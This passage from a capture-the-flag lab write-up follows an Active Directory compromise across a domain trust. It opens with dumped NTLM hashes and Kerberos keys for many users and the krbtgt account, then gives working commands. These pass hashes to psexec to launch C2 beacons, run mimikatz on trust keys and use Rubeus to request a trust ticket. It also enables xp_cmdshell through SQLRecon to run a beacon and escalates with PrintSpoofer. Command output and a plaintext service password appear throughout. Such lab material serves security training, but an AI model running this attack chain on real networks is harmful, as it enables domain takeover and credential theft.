mythical-us.vl\Kate.Dean:1123:aad3b435b51404eeaad3b435b51404ee:6923fdeb62221640fdc768c67101c9a1:::
mythical-us.vl\Lynda.Smith:1124:aad3b435b51404eeaad3b435b51404ee:47469bd2524b95e2497c2e3ecf533025:::
mythical-us.vl\Lucy.Dixon:1125:aad3b435b51404eeaad3b435b51404ee:8c7a33f632f9f073453e0014df6089a7:::
mythical-us.vl\Donna.Owen:1126:aad3b435b51404eeaad3b435b51404ee:90175cc4abbae6df4f787044897a34d9:::
mythical-us.vl\Toby.Watkins:1127:aad3b435b51404eeaad3b435b51404ee:a7763b6e3a5a0a5db69568825d926f6e:::
mythical-us.vl\Emily.Jackson:1128:aad3b435b51404eeaad3b435b51404ee:5dee0c8db1c5437bb58d69460d0469e1:::
mythical-us.vl\momo.ayase:1129:aad3b435b51404eeaad3b435b51404ee:b1e129863a28d290db8101c538e08660:::
mythical-us.vl\domjoin:1132:aad3b435b51404eeaad3b435b51404ee:e728f67b1d3929b91ef6a92b8e1f5eec:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:6d82715c3977ae0d538226986e7655a2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:eb2f66b8178956c77aca02905f8cc91c0fd9576fd42028895c9f17d485bf8c03
Administrator:aes128-cts-hmac-sha1-96:700849cd08f7c9b54a00461775e69c73
Administrator:des-cbc-md5:df52df13c2f8f7d0
krbtgt:aes256-cts-hmac-sha1-96:894bb90e7e41ec6b8094775bd8090e0cfc4bf5026323e1fb1d9859b23e0436f5
krbtgt:aes128-cts-hmac-sha1-96:5adb3227e86a9309885be18afa9c9ab8
krbtgt:des-cbc-md5:3e7975e38fe3e034
mythical-us.vl\Lynne.Baker:aes256-cts-hmac-sha1-96:8c8930c809116eac2c76afe17a992052015a1af6ce08435a262d040507174b42
mythical-us.vl\Lynne.Baker:aes128-cts-hmac-sha1-96:324abe6112b2e8e9c8c0861b556be9ac
mythical-us.vl\Lynne.Baker:des-cbc-md5:fda2625273b383b3
mythical-us.vl\Rosie.Harrison:aes256-cts-hmac-sha1-96:e8d5ca10dd59cbe02c49a7ea4c45b7b74ec2c7f024544e47dd38d651b51725b1
mythical-us.vl\Rosie.Harrison:aes128-cts-hmac-sha1-96:38fde02203d0aee4b570f2dd929686fb
mythical-us.vl\Rosie.Harrison:des-cbc-md5:585b38e05bf8e98a
mythical-us.vl\Bethany.Davidson:aes256-cts-hmac-sha1-96:2cdde5fee41150e44996d2f7614abe4e8de5c280d892f8eaa02651347f8a7e69
mythical-us.vl\Bethany.Davidson:aes128-cts-hmac-sha1-96:0b894f7bb40159edfb64557f37efeaa0
mythical-us.vl\Bethany.Davidson:des-cbc-md5:9485798c97e5bcb3
mythical-us.vl\Irene.Lees:aes256-cts-hmac-sha1-96:54090cb9f9fc809e07b75c83b779f1b31483a86bd6af10330dd2480199ebbbac
mythical-us.vl\Irene.Lees:aes128-cts-hmac-sha1-96:0c28343ee5e832f4d293541f4d92ac2f
mythical-us.vl\Irene.Lees:des-cbc-md5:61ea3d438fd9cda8
mythical-us.vl\Sandra.Davies:aes256-cts-hmac-sha1-96:ecc040d20eee84f43171ebd479250bc0ef7115ad8f6e14d1832c78858172a7f9
mythical-us.vl\Sandra.Davies:aes128-cts-hmac-sha1-96:b8d58d9cd41a69c4025047fb1eb0540b
mythical-us.vl\Sandra.Davies:des-cbc-md5:67fd3175dc80fbae
mythical-us.vl\Liam.Clarke:aes256-cts-hmac-sha1-96:000fe76d36abea7b56ae2d5da37fa739c4c57dff0fb4440ff5146fdfb8479b92
mythical-us.vl\Liam.Clarke:aes128-cts-hmac-sha1-96:2b0b2a0e7ca5f59d5f264e99417870e4
mythical-us.vl\Liam.Clarke:des-cbc-md5:3b7cbfaece793ea8
mythical-us.vl\Nathan.Miles:aes256-cts-hmac-sha1-96:a00eed54b503f3b86b1c37e0122a31a8a4092d46d66275244f2f6f904380ccf1
mythical-us.vl\Nathan.Miles:aes128-cts-hmac-sha1-96:42466b05fe0a432ce9ccc684c6aae1ee
mythical-us.vl\Nathan.Miles:des-cbc-md5:f2940b0e2f8fcb64
mythical-us.vl\Christopher.Bailey:aes256-cts-hmac-sha1-96:d5435cf795dea300508b4f6232e814df8125f8ad07fbb026c67adb4717befa15
mythical-us.vl\Christopher.Bailey:aes128-cts-hmac-sha1-96:096ae630a9fd01179d8402af6a82e183
mythical-us.vl\Christopher.Bailey:des-cbc-md5:315d46d0ec2ccea4
mythical-us.vl\Michelle.Cole:aes256-cts-hmac-sha1-96:e1c9b189d1d8764deffd75a0888d792bf320840b418403388779f9c3fe76c1c5
mythical-us.vl\Michelle.Cole:aes128-cts-hmac-sha1-96:cd74c2a621f84d755495f3c465eb83db
mythical-us.vl\Michelle.Cole:des-cbc-md5:a43b83abdfea8a5b
mythical-us.vl\Mohammed.Miles:aes256-cts-hmac-sha1-96:afc204555b1611c1e72dd7f091a4fb761f1cb558cb94e773c26242b0a3c53251
mythical-us.vl\Mohammed.Miles:aes128-cts-hmac-sha1-96:095bf4033fbe9ddeac59624dbfb76f41
mythical-us.vl\Mohammed.Miles:des-cbc-md5:7ae0c28f3d29ec49
mythical-us.vl\Olivia.Baldwin:aes256-cts-hmac-sha1-96:ed3db8ef95dd03234d59b3b7eb696629cddcc037fd2be86ac070c4b80345e253
mythical-us.vl\Olivia.Baldwin:aes128-cts-hmac-sha1-96:618e49cd9d850b9bb0d6f6e69cfb92df
mythical-us.vl\Olivia.Baldwin:des-cbc-md5:91d01f292f34bfd0
mythical-us.vl\Alison.King:aes256-cts-hmac-sha1-96:db3a6c324ad89b8aa8d6ac30c0c927ddfe639906134905abf060fa2ee59fb48e
mythical-us.vl\Alison.King:aes128-cts-hmac-sha1-96:0462638ba0658be7f69773aed85cf482
mythical-us.vl\Alison.King:des-cbc-md5:19c234252f5170ec
mythical-us.vl\Elliott.Barrett:aes256-cts-hmac-sha1-96:e75a6e653afcba7af2b233549431824f2856387f7da41e30d71196b6ae34168a
mythical-us.vl\Elliott.Barrett:aes128-cts-hmac-sha1-96:e6c6ca1e63876bffd6b1bb978a02c947
mythical-us.vl\Elliott.Barrett:des-cbc-md5:e6c7badc9d025202
mythical-us.vl\Cameron.Taylor:aes256-cts-hmac-sha1-96:36ee80045de672daff21845520c5fed2294371a8851b24cd0894f329811d994e
mythical-us.vl\Cameron.Taylor:aes128-cts-hmac-sha1-96:39df848ed1527d4b3d6766e41c2dc5ee
mythical-us.vl\Cameron.Taylor:des-cbc-md5:9134b92ce638bfc1
mythical-us.vl\Nigel.Coles:aes256-cts-hmac-sha1-96:799d1ea0fec50d7ad040d6377ff3adda0926b452072cb2889434971661f35a1e
mythical-us.vl\Nigel.Coles:aes128-cts-hmac-sha1-96:2b50f12d083b0ccdb2c46e206aea12b8
mythical-us.vl\Nigel.Coles:des-cbc-md5:79b5025b3e8c1c8f
mythical-us.vl\Julian.Ross:aes256-cts-hmac-sha1-96:dce229cd4f028c5be82d0871fabefb82e770f5e72cd44f743fab4253662f86a8
mythical-us.vl\Julian.Ross:aes128-cts-hmac-sha1-96:2cafc78f4289cf80707020759cbaaca3
mythical-us.vl\Julian.Ross:des-cbc-md5:5b8a5b73945dd310
mythical-us.vl\Nicholas.Dobson:aes256-cts-hmac-sha1-96:b21b40f0c849e720421b732de91614999bfd3a67b631ff1cb1af9eb267057f8b
mythical-us.vl\Nicholas.Dobson:aes128-cts-hmac-sha1-96:e3f67b60b086f8a1f96fde24eb9a21db
mythical-us.vl\Nicholas.Dobson:des-cbc-md5:57c15251df5151bc
mythical-us.vl\Katherine.Pearce:aes256-cts-hmac-sha1-96:382c831ba6a71dc9e1967cd1af8918e708c79247fb93b39dccad59081976e5cf
mythical-us.vl\Katherine.Pearce:aes128-cts-hmac-sha1-96:df3be22abbcd4f28de25d27b9d054ea7
mythical-us.vl\Katherine.Pearce:des-cbc-md5:a476a2dcb61cadb3
mythical-us.vl\Bruce.Foster:aes256-cts-hmac-sha1-96:4e80a958dbc14fc1cef5ce2e4dc42fd48f0114a1b7cee2e3801e917637ac2179
mythical-us.vl\Bruce.Foster:aes128-cts-hmac-sha1-96:d7f6dc10d5803e2f940d7cae139b0728
mythical-us.vl\Bruce.Foster:des-cbc-md5:7649ae028386d337
mythical-us.vl\Kate.Dean:aes256-cts-hmac-sha1-96:7bb9a1b94f3caaf034b79f7e072e223614c8af8fd101c02bd7064f4d067a89eb
mythical-us.vl\Kate.Dean:aes128-cts-hmac-sha1-96:d6dbeea816498c18cf45b1175a65eb2f
mythical-us.vl\Kate.Dean:des-cbc-md5:0ba1805d0207efdc
mythical-us.vl\Lynda.Smith:aes256-cts-hmac-sha1-96:ce302ff4ab19b0749dc2525fa9a8c9396f9e8a1a41eeacadceaafb5e31e6b7e2
mythical-us.vl\Lynda.Smith:aes128-cts-hmac-sha1-96:8823fee2618918b85942e430a3b5e2d3
mythical-us.vl\Lynda.Smith:des-cbc-md5:408032bc62071a68
mythical-us.vl\Lucy.Dixon:aes256-cts-hmac-sha1-96:81d4b3ac387e491489e8cf7eb1d67bb9c84c173169be9e438dcb563c9e1f2795
mythical-us.vl\Lucy.Dixon:aes128-cts-hmac-sha1-96:d543897159b4bba5eb97892511ba5953
mythical-us.vl\Lucy.Dixon:des-cbc-md5:a280ada7c1ec75c7
mythical-us.vl\Donna.Owen:aes256-cts-hmac-sha1-96:5c68e6d8191a6017afe91f25dc7d8dd5568efb8fae9ba076c4b1824abd35294f
mythical-us.vl\Donna.Owen:aes128-cts-hmac-sha1-96:edbbc49f2e7c8d86b07d95ea594a07d8
mythical-us.vl\Donna.Owen:des-cbc-md5:293797f8044331ad
mythical-us.vl\Toby.Watkins:aes256-cts-hmac-sha1-96:e122417a07178b62c3ab904700fcbca4583d7bab4320c642823b0afc5d639f2b
mythical-us.vl\Toby.Watkins:aes128-cts-hmac-sha1-96:8df1bb63f386ae6c9993ef0c5b600bd8
mythical-us.vl\Toby.Watkins:des-cbc-md5:f2bcb57f85cee3d6
mythical-us.vl\Emily.Jackson:aes256-cts-hmac-sha1-96:f6ff7e46e52ed68ac65cba26b73eb8b88fc915fbf92c26b683f37c251ce6c008
mythical-us.vl\Emily.Jackson:aes128-cts-hmac-sha1-96:96726473d97a6f425c9be035b629883f
mythical-us.vl\Emily.Jackson:des-cbc-md5:d3ba23495b2fa49e
mythical-us.vl\momo.ayase:aes256-cts-hmac-sha1-96:75af20611bef0230e82f072700ddd28bb90643dcddbeb3d91bacaa676eff4ed5
mythical-us.vl\momo.ayase:aes128-cts-hmac-sha1-96:6e0580ad161f84fb6374ba0e41c1cc7d
mythical-us.vl\momo.ayase:des-cbc-md5:8589ecd68658575b
mythical-us.vl\domjoin:aes256-cts-hmac-sha1-96:5163b1e1ea05569e1417807fd54383cd1e9d643fa1e4c25b4d081d16a1c7ee8c
mythical-us.vl\domjoin:aes128-cts-hmac-sha1-96:be56918c325976201fd1e3a38b6d319c
mythical-us.vl\domjoin:des-cbc-md5:ae2ce66d945b196d
DC01$:aes256-cts-hmac-sha1-96:680298a2079cf0cb21c9c3c2ffed50770312bf33270a2822e6462fe343495ffb
DC01$:aes128-cts-hmac-sha1-96:68712ece4a1eeb762ebd0164f4d926be
DC01$:des-cbc-md5:8352c834bf310e13
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

If don’t care about OPSec then we can upload it and use shell command to execute it:

upload
shell .\secretsdump.exe -hashes :C583EF48C5ED66C727AECB6FAB87AC12 -dc-ip 10.10.140.37 administrator@dc01.mythical-us.vl

OR

run .\secretsdump.exe -hashes :C583EF48C5ED66C727AECB6FAB87AC12 -dc-ip 10.10.140.37 administrator@dc01.mythical-us.vl

Then upload psexec.exe and let’s launch a new beacon as ntsystem:

upload
run -Executable .\psexec.exe -Arguments "-hashes :c583ef48c5ed66c727aecb6fab87ac12 -dc-ip 10.10.168.133 mythical-us.vl/Administrator@dc01.mythical-us.vl C:\programdata\1\apollo.exe"

Then we got a new callback as SYSTEM (we can see that system beacon session has a red icon):

image

Right click and Interact then quick check:

whoami
Local Identity: NT AUTHORITY\SYSTEM
Impersonation Identity: NT AUTHORITY\SYSTEM
getprivs
Impersonation identity enabled privileges:
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeDelegateSessionUserImpersonatePrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

Primary identity enabled privileges:
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeDelegateSessionUserImpersonatePrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

Grab the 2nd flag Mythical_User-2:

ls \\DC01\C:\Users\Administrator\Desktop
cat C:\Users\Administrator\Desktop\flag.txt
VL{7c3db91130a39f2981934c3f3373f32d}

Domain Trusts breaking

We will use the same method that we use for the Vulnlab - RedTeam Labs - Wutai.

Using the embedded mimikatz module, we get SID of MYTHICAL-US.VL, SID of MYTHICAL-EU.VL and the Hash of the trust account (used for the communication between these 2 domains):

mimikatz -Commands "privilege::debug" -Commands "lsadump::trust /patch"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec  1 2021 12:21:44
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::trust /patch

Current domain: MYTHICAL-US.VL (MYTHICAL-US / S-1-5-21-614429729-4048209472-3755682007)

Domain: MYTHICAL-EU.VL (MYTHICAL-EU / S-1-5-21-1148612195-3581135157-3534241443)
 [  In ] MYTHICAL-US.VL -> MYTHICAL-EU.VL

 [ Out ] MYTHICAL-EU.VL -> MYTHICAL-US.VL
    * 12/3/2024 10:16:32 AM - CLEAR   - a1 39 02 5e 0a 3d ce c0 af c9 6a ab 1c ea 0a 0a 7e 3f 20 d2 ea f6 95 93 c2 9f f8 7e 
	* aes256_hmac       cecbd91e50ff3ee7fbd725fbe9e2f3ea4d4445e549100607c3f2239307391076
	* aes128_hmac       652888ee3ab5fac7ea1ebf84e423d59d
	* rc4_hmac_nt       eb921a2b0e9d626559dab0f54fdc6498

 [ In-1] MYTHICAL-US.VL -> MYTHICAL-EU.VL

 [Out-1] MYTHICAL-EU.VL -> MYTHICAL-US.VL
    * 12/3/2024 10:12:53 AM - CLEAR   - 3b 34 ae 63 14 ba f5 89 db 8b c3 d7 81 b4 83 e0 19 a9 26 6c ac ef 21 e4 7a a0 25 5c 
	* aes256_hmac       cd80277ce08b60be2c3e7e9efabc0cb07a5f524c96289f20a1ee61c383e91a57
	* aes128_hmac       80148ce8d8cca3780d03294ab5727751
	* rc4_hmac_nt       b97e5160a2a6df7f67c19f17495232f0


[*] Process exited with code: 0x0

Create a new beacon session as usual to have one session dedicated as Trust:

run -Executable .\psexec.exe -Arguments "-hashes :c583ef48c5ed66c727aecb6fab87ac12 -dc-ip 10.10.168.133 mythical-us.vl/Administrator@dc01.mythical-us.vl C:\programdata\1\apollo.exe"

image

Change the sleep to 2s to become more interactive:

sleep 2 0

Register Rubeus.exe in this appolo session (same way than before):

register_assembly

image

Get the TGT of Trust:

execute_assembly -Assembly Rubeus.exe -Arguments "asktgt /user:mythical-us$ /domain:mythical-eu.vl /rc4:eb921a2b0e9d626559dab0f54fdc6498 /nowrap /ptt"
   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: Ask TGT

[*] Using rc4_hmac hash: eb921a2b0e9d626559dab0f54fdc6498
[*] Building AS-REQ (w/ preauth) for: 'mythical-eu.vl\mythical-us$'
[*] Using domain controller: 10.10.233.183:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFrjCCBaqgAwIBBaEDAgEWooIEuTCCBLVhggSxMIIEraADAgEFoRAbDk1ZVEhJQ0FMLUVVLlZMoiMwIaADAgECoRowGBsGa3JidGd0Gw5teXRoaWNhbC1ldS52bKOCBG0wggRpoAMCARKhAwIBAqKCBFsEggRXmU7sYREEjxVdahYUX/Cq1whVCNWrP98GulBB45jjRmdBeP7cj6khrikE4RS/mbOGfa18oEBRe7UAfUGAOtYhLP2IxjTnF+cLHLPP0BhxjrH5zD6S5fE7DWm4THnpUCEi40xSGo/Uel6v0s1H3m0Q1t7vARiEXWAjo6xWvrznk/F6Gu4eQRFu/DgW41ftGGL2cl3fbyHiuFIljCHLJHjBymQTinLlWIX7+HHppF9OJHFjE+Er2rIyWZOyW1ztzBBMv1DchIPemKtzsaxjPwBZtB0w4UWtGifowFDq8/HzpM17QRvb0XBhOANoJXQM+BZhZXJHB6/YafBM3TYZpBKCkyyfw9APyRoBDHpJ3mW0hlY0EEnwPCqhn+POICnZrO0KA8RyQTOLPoSuZsh/V5n93hbar0ACtwlE9JxQ8Dba/COmdf40tUcu/2oyhXwZHoDMdcf9CQbkrA5r3fSEX3Q7Fzlcdmvn9x/bhbbydgz7lfx2wa2woduTJ5eUSfCSlb0I8ky+59VR7Sm1fw3OkhGexSKOI1N5xwj9wlB40eqUvj6czJVWBCptyqGVNwS+4Qo9TQM6owfTnKC9mgZClIJ6xCwJu6n81/mcRo3qHEJJFEvYgU8R+BL3tx7uKfwDvfMYzaodS1XJnJBOz5Gz085NeYmnzAgKIa2Lt0gYQ5FWxd9JTcHV+w45S31sZ/TEWHdbdUe6yGt1PjUsy/B4EnWo6HTlnNcCNBvVIP3eUkfmVW0J12TelV+MeKqzqywJo8dtGBiW9KL19bYmbV9CyXD4yWbiq60romWKNjg6cLO2Gyim9K1djoldA0YU0qtfUp6PITwdNIZF6QT7ps1k3W4lcE4fEOa2qh8MXCw4fzHQAohxEPQGXpjXZ32WdP3b0L/L26RzNqKE3q/mdsLy0A0NpEBsW8wsMX9/lgnD6j4dLQH+EQcjHNY5Ozwamo60QM0Qc7C0kMpSfpdqF/ZtXoR1Csx2jS+Jp34LULH5SNLyKvnZzkQHpfBglMBmFR2iRMi5539C1lJ9KETuAQyNB3VNdow4rUfBjoy72UhON8ZN+MiY7c1tjk7So7zt6+ReZb90zPHCn9VFNr97L0bI3R4+i+LGd7I8IHXDyxPG+IYyVp5w7B4pzJx4d90hmcOhC+JvUN/xNbMVMTb6b5oyMJ2bb/NLNT+ekggt6t5XRZankgm+fiSdDMSMcKdFAFBUSUIi45zvBy2sls/uwxmWHANUTgyke6k5/9Q8l7lK2IGP7C+RrU/+X8QJ3qDoY1SOmvMPHxyLeCWMMnfBbGPgcLizEF01usWPwcudfeHheihB6PIk6aHHaZ/sMOVKaiaTrjKhVdvgReZQHoi3+YurAU2JffS7DymziBdcJplQIJkXYcd88bbLcgOCpkHCg34NRUE459e1aWcIyjAN2D7AOSx75wKXNqDISsaOYNJui+NGJuRyo88GW94ELAE3nBHDDb6jSANWNVMpv6OB4DCB3aADAgEAooHVBIHSfYHPMIHMoIHJMIHGMIHDoBswGaADAgEXoRIEEKciWELwoKE/LfYgIjo95ImhEBsOTVlUSElDQUwtRVUuVkyiGTAXoAMCAQGhEDAOGwxteXRoaWNhbC11cySjBwMFAEDhAAClERgPMjAyNDEyMTAwOTE1NTNaphEYDzIwMjQxMjEwMTkxNTUzWqcRGA8yMDI0MTIxNzA5MTU1M1qoEBsOTVlUSElDQUwtRVUuVkypIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDm15dGhpY2FsLWV1LnZs
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/mythical-eu.vl
  ServiceRealm             :  MYTHICAL-EU.VL
  UserName                 :  mythical-us$
  UserRealm                :  MYTHICAL-EU.VL
  StartTime                :  12/10/2024 1:15:53 AM
  EndTime                  :  12/10/2024 11:15:53 AM
  RenewTill                :  12/17/2024 1:15:53 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  pyJYQvCgoT8t9iAiOj3kiQ==
  ASREP (key)              :  EB921A2B0E9D626559DAB0F54FDC6498

We clean our current cached ticket:

ticket_cache_purge
Purged Ticket from Cache

We import our new kerberos ticket:

ticket_cache_add

image

Injected Ticket into Cache

.Net disassembling (svc_ldap)

Check if we can now list shared resources at DC02:

net_shares {"Computer":"dc02.mythical-eu.vl"}

image

Success and found a SMB shared folder dev

Check this folder:

ls \\dc02.mythical-eu.vl\dev

image

Download both:

download \\DC02.MYTHICAL-EU.VL\Dev\Autologon64.exe
download \\DC02.MYTHICAL-EU.VL\Dev\getusers.exe

Quick check:

$ file Autologon64.exe             
Autologon64.exe: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections

$ file getusers.exe   
getusers.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows, 2 sections

getusers.exe is a dotnet binary so let’s go to dissambly it using ILSpy:

Note

-ILSpy v8 needs to have .NET 6.0 Desktop Runtime installed before use it.

image

Found credential for a service account: svc_ldap:osaRXWkDf2y5SGh5

BloodHound - mythical-eu.vl

We can get the mythical-eu.vl domain users list using the default powershell command below (as ActiveDirectory module is installed in a DC):

powershell Get-ADUser -Filter * -Server "dc02.mythical-eu.vl" -Property DisplayName, SamAccountName | Select-Object DisplayName, SamAccountName

DisplayName      SamAccountName  
-----------      --------------  
                 Administrator   
                 Guest           
                 krbtgt          
Wendy Adams      Wendy.Adams     
William Jennings William.Jennings
Julie Khan       Julie.Khan      
Alan Rhodes      Alan.Rhodes     
Jay Little       Jay.Little      
Owen Dunn        Owen.Dunn       
Howard Frost     Howard.Frost    
Naomi Campbell   Naomi.Campbell  
Judith Smith     Judith.Smith    
Nicholas Hill    Nicholas.Hill   
Karl Kaur        Karl.Kaur       
Hilary Pearson   Hilary.Pearson  
Marcus Elliott   Marcus.Elliott  
Fiona Knight     Fiona.Knight    
Jay Miller       Jay.Miller      
Josephine Smith  Josephine.Smith 
Mohammad Jones   Mohammad.Jones  
Glen Price       Glen.Price      
Amber Hussain    Amber.Hussain   
Megan Higgins    Megan.Higgins   
Donald Burton    Donald.Burton   
Jasmine Smith    Jasmine.Smith   
Kim Byrne        Kim.Byrne       
Jack Chambers    Jack.Chambers   
Danielle Andrews Danielle.Andrews
svc_ldap         svc_ldap        
svc_sql          svc_sql         
root             root            
                 MYTHICAL-US$    

We register sharphound.exe in this apollo’s session:

register_assembly

image

Change to our folder:

cd c:\programdata\1

Then execute it:

execute_assembly -Assembly SharpHound.exe -Arguments "-c All,LoggedOn -d mythical-eu.vl"

Then download it:

download \\DC01\C:\ProgramData\1\20241210022526_BloodHound.zip

Then injest it to BloodHound CE and analyse:

Get the list of all users:

image

Nothing really interesting except that we have 2 services accounts:

image

  • svc_ldap (pwned)
  • svc_sql

There is 0 objects in Domain Computers and only 1 DC already know (DC02)

MSSQL abuse by password reusing (MSSQL$SQLEXPRESS)

We create a new session to try to impersonate as svc_sql cheking if the password for svc_ldap has been reused:

image

sleep 2 0
make_token -username mythical-eu.vl\svc_sql -password osaRXWkDf2y5SGh5

Double check:

whoami
Local Identity: NT AUTHORITY\SYSTEM
Impersonation Identity: mythical-eu.vl\svc_sql

Success

Change to our folder location:

cd c:\programdata\1

Copy the SQLcmd (as we found previously that MSSQL is present on this DC then the sql command line tool should be also present) to our folder:

cp -Path "C:\Program Files\SqlCmd\sqlcmd.exe" -Destination "c:\programdata\1\sqlcmd.exe"

Copy our beacon to \DC02.mythical-eu.vl\dev:

cp -Source c:\programdata\1\apollo.exe -Destination \\DC02.mythical-eu.vl\dev\apollo.exe

Upload SQLRecon:

upload

image

Then run it to call our beacon and get another session on the DC02 as MSSQL$SQLEXPRESS:

run -Executable SQLRecon.exe /a:windomain /d:mythical-eu.vl /u:svc_sql /p:osaRXWkDf2y5SGh5 /h:dc02.mythical-eu.vl /m:Query /database:msdb /c:"EXECUTE AS USER = 'dbo'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'cmd.exe /c C:\dev\apollo.exe';"

image

Interact then reduce the sleep as usual:

sleep 2 0

Quick check:

whoami
Local Identity: NT Service\MSSQL$SQLEXPRESS
Impersonation Identity: NT Service\MSSQL$SQLEXPRESS

Privilege escalating && secrets dumping (Mythical_Root)

Create our folder:

cd c:\programdata
mkdir -Path 1
cd 1

Upload PrintSpoofer64:

upload

image

Upload our beacon apollo.exe:

upload

Then let’s go to get a new session as SYSTEM on DC02:

run -Executable PrintSpoofer64.exe -Arguments "-c c:\programdata\1\apollo.exe"

image

sleep 2 0

Double check:

whoami
Local Identity: MYTHICAL-EU\DC02$
Impersonation Identity: MYTHICAL-EU\DC02$

Success

Grab the last flag:

cat C:\Users\Administrator\Desktop\root.txt
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣷⣶⣤⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⣿⣿⣿⣷⡒⢄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣿⣿⣿⣿⣆⠙⡄⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣤⣤⣤⣤⣤⣤⣤⣤⣤⠤⢄⡀⠀⠀⣿⣿⣿⣿⣿⣿⡆⠘⡄⠀⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⢿⣿⣿⣿⣿⣿⣿⣿⣦⡈⠒⢄⢸⣿⣿⣿⣿⣿⣿⡀⠱⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣦⠀⠱⣿⣿⣿⣿⣿⣿⣇⠀⢃⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣷⡄⣹⣿⣿⣿⣿⣿⣿⣶⣾⣿⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
